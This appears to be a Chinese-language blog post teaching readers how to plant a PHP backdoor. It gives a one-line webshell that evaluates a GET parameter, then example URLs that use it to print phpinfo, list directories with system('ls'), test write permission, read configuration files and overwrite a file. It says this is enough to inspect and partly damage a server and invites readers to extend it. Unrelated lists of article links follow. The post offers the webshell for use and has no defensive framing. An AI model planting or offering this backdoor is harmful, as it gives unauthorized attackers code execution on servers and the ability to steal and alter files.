今天我们说一些最常见的PHP留后门的一些用法

首先,写一个最简单的后门,也可以叫做木马。

<?php eval($_GET['evl']);

就这样,你已经获得了这台服务器上的很多执行权限。

那场景的用法有哪些呢?

打印服务器phpinfo

http://www.test.com/a.php?evl=phpinfo()

查看某个目录下有什么文件

http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));

查看目录是否可写,接下里就可以在可写的目录里创建可执行文件了

http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));

获取某个文件的内容,一般用来读取配置

http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));

对某个可写目录进行写文件

http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));

好了,以上基本已经可以完成对一个服务器的查看的部分破坏了,其他的功能就试着举一反三吧。

更多相关文章

  1. 使用file_get_contents()函数读取文件内容
  2. php文件后缀名是什么
  3. 如何对php文件加密
  4. php文件上传步骤是什么
  5. php如何获取上传文件大小
  6. php引入文件的四个方法
  7. PHP实时生成并下载超大数据量的EXCEL文件
  8. PHP实现文件上传下载实例详细讲解
  9. php怎么启动exe文件

随机推荐

  1. Android故障积累----(1/N)
  2. Android HandlerThread
  3. Android屏幕自适应详解
  4. 让应用程序不被任务管理器杀死...(获取系
  5. 2011.07.11(3)——— android xliff字符串
  6. android studio 中设置apk的版本号
  7. android 积累一些自定义view的知识
  8. 【Android】Android Studio启动配置gradl
  9. android 技术文章个人搜索集锦
  10. android实时监听网络状态并在断网的情况